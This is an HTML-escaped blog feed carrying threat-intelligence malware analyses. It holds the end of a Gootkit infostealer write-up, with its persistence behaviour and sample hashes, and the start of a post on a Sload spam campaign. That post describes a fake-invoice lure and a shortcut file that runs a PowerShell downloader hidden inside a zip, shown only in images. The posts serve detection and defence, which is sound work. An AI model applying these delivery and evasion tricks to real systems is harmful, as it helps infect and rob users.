&lt;p&gt;At this point it killed “explorer.exe”. The following image shows the process list before the “TerminateProcess” command.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1166px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/58cf34602d4ac2da389fe2ec38998fee/077b7/gootkit29.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 43.489583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABYlAAAWJQFJUiTwAAAB2UlEQVR42j2KW2vTUACA88MHigjCnn32QVCGiq443GrHtk5tR5Necmuay0lycj85uZ2cXBobGwuC8PHxPXxMjPwcowyFJMeBw7r+Y+DPcKxRUsQ4yXOCYpxmOSkrQmhJK1rVpy4Ibds9oylCaBkR3JHU0fRdALdxKCXZqq+RYsa/RMSpOW/VG7Pi1GINqOh0G7NZGhUIKAPBNvNtDEFHsWQsbW1ugRsj+DrsExYUb6fuSGjHxvCJyy9m0Yivb7RhrA+fN81czRjf0Uvkkcj5XSYyuDfNjyF854ZfOrIW7HDE+ZNd8RQOEyX7xkePdnvqRTTcGfXayhhNYLEDQkvLMJR310B5v+FfG/BDnW5t250vFFlyUdypaiSKEMIijNoIdQCkEMYM+zD29a2nK8i1HjS4k+PYli3vDS1W2fZSvz7zJs8Pq3M0feHdPitmLxv2Vbs8T6ZnqXzJRL5Z4iCGBsXBypRMY5N6M8u/aKhqa4a8Xgrc0wlZYLcip0icIq8knhU3C9+1GUPhTVU0ZN4DO6D90NUrS7vyrJ8FtmuCK5I0JKtISoukKtKmzHzXmXyf3E1uoW0zbUUaSk7uu2boD0N/PB5O/DkeuqHfD/0//6c7bSmOUODWJfkLouzW0PcFIh8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit29&quot;
        title=&quot;&quot;
        src=&quot;/website/static/58cf34602d4ac2da389fe2ec38998fee/077b7/gootkit29.png&quot;
        srcset=&quot;/website/static/58cf34602d4ac2da389fe2ec38998fee/804b2/gootkit29.png 384w,
/website/static/58cf34602d4ac2da389fe2ec38998fee/e5715/gootkit29.png 768w,
/website/static/58cf34602d4ac2da389fe2ec38998fee/077b7/gootkit29.png 1166w&quot;
        sizes=&quot;(max-width: 1166px) 100vw, 1166px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;After having executed that command, we found that a new instance of the malware spawned as a child of “explorer.exe”.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1184px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6cc1700ff26be0201fe1e053c5c0ec33/7321b/gootkit30.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 35.9375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAABfUlEQVR42iXLzXKTQAAAYJ7Powc9OPVNfAFfwJs3b44/oxmnWhNJLaWQkARFIOxCFvaf3W3+SgPY1sw4810/63DbCEY4IzUjuhYM/0alg7EvJTBaVxhTyghmjMm61lIqpYwy62u93u8b6+FvKzHgCAgE1nWRwRjBGSe+1E6/l2GpxksZiDbgBzvl46WYy87JzRiYaSH/Z8hLqMui26gUJWniIHgGycd+X4TF9cClLugmqP8+r8fRJqjuj66K/ipW1l3bSJpLhgwubgwHyI3jN1nyuijf7tQvhbxsMlDpjwNxeXx21DGv494BXwjgWv3Nliz8cu4pvNoZmuUTkH6B2buSDG63dOW/XHx4tPGfNcEJsZ9y+0kXPt9NTzaXj/n0hXXft5l/Ef0cViBh2R87AUFEBUgi+IrT8zycJu5pNRuuJsPF6FNkfwbut9wbgctTOHOsh7vWKKoEkRXccpKV4TIfyfIroe+bba61rtWREVIxLoWsmVRRAhbRsqL8H0RPaNId+lbDAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit30&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6cc1700ff26be0201fe1e053c5c0ec33/7321b/gootkit30.png&quot;
        srcset=&quot;/website/static/6cc1700ff26be0201fe1e053c5c0ec33/804b2/gootkit30.png 384w,
/website/static/6cc1700ff26be0201fe1e053c5c0ec33/e5715/gootkit30.png 768w,
/website/static/6cc1700ff26be0201fe1e053c5c0ec33/7321b/gootkit30.png 1184w&quot;
        sizes=&quot;(max-width: 1184px) 100vw, 1184px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;What happened? We performed some tests and it seems that “ explorer.exe” was killed and then automatically restarted by “winlogon.exe”. Therefore “explorer.exe” accessed the keys involved in the persistence mechanism previously explained:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 726px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/41ceb34a48bce952055e32ab4d1a286e/f8067/gootkit31.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.291666666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAASElEQVR42gE9AML/AJ7A26XH05q61KLE4ZO61oKtxZ+92KPD3p292Jm51Jm41Ju71pi20py82Ju815y92Jy71ZK105O83KjR8CyXK6nPZKAgAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit31&quot;
        title=&quot;&quot;
        src=&quot;/website/static/41ceb34a48bce952055e32ab4d1a286e/f8067/gootkit31.png&quot;
        srcset=&quot;/website/static/41ceb34a48bce952055e32ab4d1a286e/804b2/gootkit31.png 384w,
/website/static/41ceb34a48bce952055e32ab4d1a286e/f8067/gootkit31.png 726w&quot;
        sizes=&quot;(max-width: 726px) 100vw, 726px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;2 - the “ --&lt;em&gt;&lt;strong&gt;service&lt;/strong&gt;&lt;/em&gt;” command did not change the flow of execution with the exception of creating a new environment variable called “USERNAME_REQUIRED” and set it to “TRUE”.&lt;/p&gt;
&lt;p&gt;Eventually we found that the final stage checks if the aforementioned variable exists.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 495px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/367c9b4376e17c41a1c7d87f555774fe/a4d88/gootkit32.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 13.020833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwklEQVR42gG3AEj/AL7BxdTM29jO2+fN5N7cu9reo+jkqOLppNzipOXlpejrp9LKr8y+usu8tMy6ssy6scm6s8u7s8/Cut3a1gDSzZzIxqDSzqPazKfQ1J66z4Lr2YzK6r/l8dT99NX49tXs4tHp2dDr3tTu49zr29Hr39fx7OXw6uPx6OAAx8ZxzNB/19mAzst+x8uHtcZ31suE2+7g8vj4//r3/fn3+O7m/O3h/O/j/PDm/O/k+unc++vg++vf+ujctKCUg8PZDiUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit32&quot;
        title=&quot;&quot;
        src=&quot;/website/static/367c9b4376e17c41a1c7d87f555774fe/a4d88/gootkit32.png&quot;
        srcset=&quot;/website/static/367c9b4376e17c41a1c7d87f555774fe/804b2/gootkit32.png 384w,
/website/static/367c9b4376e17c41a1c7d87f555774fe/a4d88/gootkit32.png 495w&quot;
        sizes=&quot;(max-width: 495px) 100vw, 495px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;3 - the “ -&lt;em&gt;&lt;strong&gt;test&lt;/strong&gt;&lt;/em&gt;” command just terminate the process. Indeed it’s a test.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;9.Conclusions&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;We explored some of the functionalities of one of the most widespread Infostealers of these days, revealing new and old tricks that is using to remain undetected as much time as possible.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Certego&lt;/strong&gt;&lt;/em&gt; is actively monitoring every day threats to improve our detection and response methods, continuously increasing the effectiveness of the incident response workflow.&lt;/p&gt;
&lt;p&gt;PS: Let us know if you liked this story and feel free to tell us how we can improve it!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hash&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;597f734c780f283d6cd7c7443700a65249b8350ec1ad58b8aa790a32f57eec4d&quot;&gt;&lt;pre class=&quot;language-597f734c780f283d6cd7c7443700a65249b8350ec1ad58b8aa790a32f57eec4d&quot;&gt;&lt;code class=&quot;language-597f734c780f283d6cd7c7443700a65249b8350ec1ad58b8aa790a32f57eec4d&quot;&gt;GLS_Notifica.js
5ed739855d05d9601ee65e51bf4fec20d9f600e49ed29b7a13d018de7c5d23bc
gootkit 1st stage
e32d72c4ad2b023bf27ee8a79bf82c891c188c9bd7a200bfc987f41397bd61df 
gootkit 2nd stage
0ad2e03b734b6675759526b357788f56594ac900eeb5bd37c67b52241305a10a 
gootkit DLL module&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1&gt;&lt;strong&gt;Athor:&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;Matteo Lodi, Threat Intelligence Lead Engineer&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Sload hits Italy. Unveil the power of powershell as a downloader]]></title><description><![CDATA[Hi everyone, here is Matteo Lodi, Threat Intelligence Analyst in Certego.Recently, we saw a particular new spam campaign targeting italian users with the focus of delivering a downloader known as Sload.]]></description><link>https://www.certego.net/blog/sloadhits/</link><guid isPermaLink="false">sloadhits</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Team Leader]]></dc:creator><pubDate>Thu, 22 Nov 2018 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi everyone, here is Matteo Lodi, Threat Intelligence Analyst in Certego.&lt;/p&gt;
&lt;p&gt;Recently, we saw a particular new spam campaign targeting italian users with the focus of delivering a downloader known as &lt;em&gt;&lt;strong&gt;Sload&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Nowadays, attackers are trying harder and harder to make difficult the analysis and the detection. The most common tool misused in this way is &lt;em&gt;&lt;strong&gt;Powershell&lt;/strong&gt;&lt;/em&gt;: it&apos;s installed by default in every recent version of Windows and is commonly used to perform administrator tasks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The infection chain&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s dig in the infection chain:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 794px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3e1e7a1bd935c4390aaddb9def7570d5/7de01/SloadHits1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 141.40625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,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&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3e1e7a1bd935c4390aaddb9def7570d5/7de01/SloadHits1.png&quot;
        srcset=&quot;/website/static/3e1e7a1bd935c4390aaddb9def7570d5/804b2/SloadHits1.png 384w,
/website/static/3e1e7a1bd935c4390aaddb9def7570d5/e5715/SloadHits1.png 768w,
/website/static/3e1e7a1bd935c4390aaddb9def7570d5/7de01/SloadHits1.png 794w&quot;
        sizes=&quot;(max-width: 794px) 100vw, 794px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;1.&lt;/strong&gt;&lt;/em&gt; A user receives an email with subject &quot;&amp;#x3C;TARGET_COMPANY_NAME&gt; Emissione fattura &amp;#x3C;random_number&gt;&quot; containing a reference to a fake invoice.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1288px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/63665b0394bc1a2557606810b8165447/01a87/SloadHits2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 36.45833333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2ElEQVR42qWRy27DIBBF+f/PyL6bfkjWletmU2TJqmNjGwMDgdsZ8lKkZpOOdHQ8GNncQWmtGwDvjHjPzDhXwQulZjNnoli4kHMGEcE5B+99tfQpJUSmOl4dq1N67FXbfqJpPgqTvw5t1vq7DMMR0zRhHEdYa28fF7bLzza3Vd/fnXu1zAXGFAzHjJ+h8MaXkt4jG2Oj8zFw2sInxulUIPGfAQF/rMsqWzln37zfdjGS+c9l3E7Y9z11XSdkfub4ps5NWNf1gWVZEHhOgS8qhFBnJiZGHCjgF+y4InvHTzhfAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/63665b0394bc1a2557606810b8165447/01a87/SloadHits2.png&quot;
        srcset=&quot;/website/static/63665b0394bc1a2557606810b8165447/804b2/SloadHits2.png 384w,
/website/static/63665b0394bc1a2557606810b8165447/e5715/SloadHits2.png 768w,
/website/static/63665b0394bc1a2557606810b8165447/01a87/SloadHits2.png 1288w&quot;
        sizes=&quot;(max-width: 1288px) 100vw, 1288px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The user is tricked to click on the malicious link that points to a randomly generated domain hosted with HTTPS in &lt;em&gt;&lt;strong&gt;91.218[.]127.189&lt;/strong&gt;&lt;/em&gt;. The following is an example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/33ef6d1ac86c6e1d53c94ec9f1e0e22f/394f7/SloadHits3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.291666666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAM0lEQVR42h2KQQ4AIAjD/P9DiYNxkcDZabNL063MJDXGg4ALABL3kCn5Rzcz28Cp6u6ZuZEUN1CZpSWjAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/33ef6d1ac86c6e1d53c94ec9f1e0e22f/394f7/SloadHits3.png&quot;
        srcset=&quot;/website/static/33ef6d1ac86c6e1d53c94ec9f1e0e22f/804b2/SloadHits3.png 384w,
/website/static/33ef6d1ac86c6e1d53c94ec9f1e0e22f/394f7/SloadHits3.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;2.&lt;/strong&gt;&lt;/em&gt; Once downloaded, if the user opens the archive, it would find two files. The first one is a legit image, while the second one is a &lt;em&gt;&lt;strong&gt;.lnk file&lt;/strong&gt;&lt;/em&gt;. We have already seen the misuse of shortcut files with powershell to perform the download of malicious samples. But this time it seemed different: in fact, the .lnk points to the following command:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 708px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/61a4f09a7dbb82d945473876728b4761/3cb0f/SloadHits4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlUlEQVR42l1Oyw7DIAzj/3+xHe9HSQkMdoHbXG2qpvngJI7lRBBR751yPo5czrOUMvqozLXWlNJVuHJhorO152uMGFPOBFtrTVhrjXXGGBStNSK89xCdc1ob57xWWkm1bztGKeW27fKhrpX3gplDiB/k6/6BVERgBGOF17wLMUQEATBABEMXc8611vzD+oo3rx/T3b4B9C/cguXBevwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/61a4f09a7dbb82d945473876728b4761/3cb0f/SloadHits4.png&quot;
        srcset=&quot;/website/static/61a4f09a7dbb82d945473876728b4761/804b2/SloadHits4.png 384w,
/website/static/61a4f09a7dbb82d945473876728b4761/3cb0f/SloadHits4.png 708w&quot;
        sizes=&quot;(max-width: 708px) 100vw, 708px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;3.&lt;/strong&gt;&lt;/em&gt; Where is the download? At first glance, that seemed very strange: what is the aim of this execution? After having analyzed the command, the trick was clear. The attackers wants to call &quot;Invoke-Expression&quot; command to run a string hidden inside the zip itself!! But where?&lt;/p&gt;
&lt;p&gt;As we can see in the following image, at the end of the original downloaded zip file we can see readable strings that are the real first stage downloader!!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 608px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4157bf7ffad63438ecf8eaa19f10ac53/18872/SloadHits5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 107.29166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAIAAADJt1n/AAAACXBIWXMAAAsTAAALEwEAmpwYAAADLklEQVR42jWUiXLaQBBE9QNJJXYOu5zYxua+MehAEkhiJZAAIc74yPn/X5E3kl1FbY12d3a6e3rQ/oVPT06WNP39KMkGi3VXHfTlph8SpD217qj9KE67atMLp9+G1pduVLGDWzMs2+OvXY2rnPGt7sbzqqvu7Xl1Mq9NiJdNL6o4SdNb5J8k2xd981N79LEZVhxJfnG3J3MVlh2KUH9Rny5bwbLlx3mw6UfLpp92Q07dq8HwQ8O5HHjXelAyncu+9i96epnueH77sMgG87QX7gj60aozIz6aKwCTuRsu/BvDvuwnjSnB+KKnnzW1/TABtn9rvMEeUzNuTIEKZuARw4JNqpmf2/blAPyD97X+u4r2PNn9GKdxw9sLeSkC1O3DnJWaq/aMYD9a7oYxyfp5ixrGeYuyww91gf3sblft4GSliLfXE2TfDuawIGYlmRdP1npWMo1PbdGi6fNoWB5rPJl2lH+jAxLNZyUrqrrIhuZR2QlKFlzYIce9euAaukAN2a0vHe2nd3i0U24fjGWhWZaXFbSgGMZQoACn/rWO2tykBsn6WUtgY5K47mUP8SG/fTRWJIgxoJ0z3/SgHZMD53U3TBoevVB3lgbDdWfGAbCjiouw8Bdj1EVk1kV9wic95w4saC9loSAm+eUfH+2MxlAk6wtCfpmIJH1etsUwxGgmyYhyZ6EW6OYVR/sbPj67GRWkK70IwlQuMouepb0ICqhAqw7mitaw/3O6x96iNlf9WxN5+S7sjZ5RHsDFf2XkTL+PaLIq2xBOWoFz0dN+eYeXyZbKjJSMkQxTSCcBjFTsMGECYTDH0niJWJpXcRgb7a96fHI2JLOLw3g1V1gBXnbEZIF4XibPEIAVlykq3FrAxtuMqIOwixrG9sAPcnbUvYW92YcU84BgMp61SXBjMJva79kJ2CDJuyoIkVd+UlkMk+RQd7lgtONo8FcRvUx2cX2i/VE/8K3Mc1cVIuf/GyoXP8xnIyDmlMqoWMwMrXo1CVQZyUJt4dPwACIjWYWeCJ6vLoIRL8RFM0m51jU6RmV6wNugTeoeA4yfcFXecPW2ziS56uLTVUcdTcCO/wMnECXEGOgRQQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4157bf7ffad63438ecf8eaa19f10ac53/18872/SloadHits5.png&quot;
        srcset=&quot;/website/static/4157bf7ffad63438ecf8eaa19f10ac53/804b2/SloadHits5.png 384w,
/website/static/4157bf7ffad63438ecf8eaa19f10ac53/18872/SloadHits5.png 608w&quot;
        sizes=&quot;(max-width: 608px) 100vw, 608px&quot;
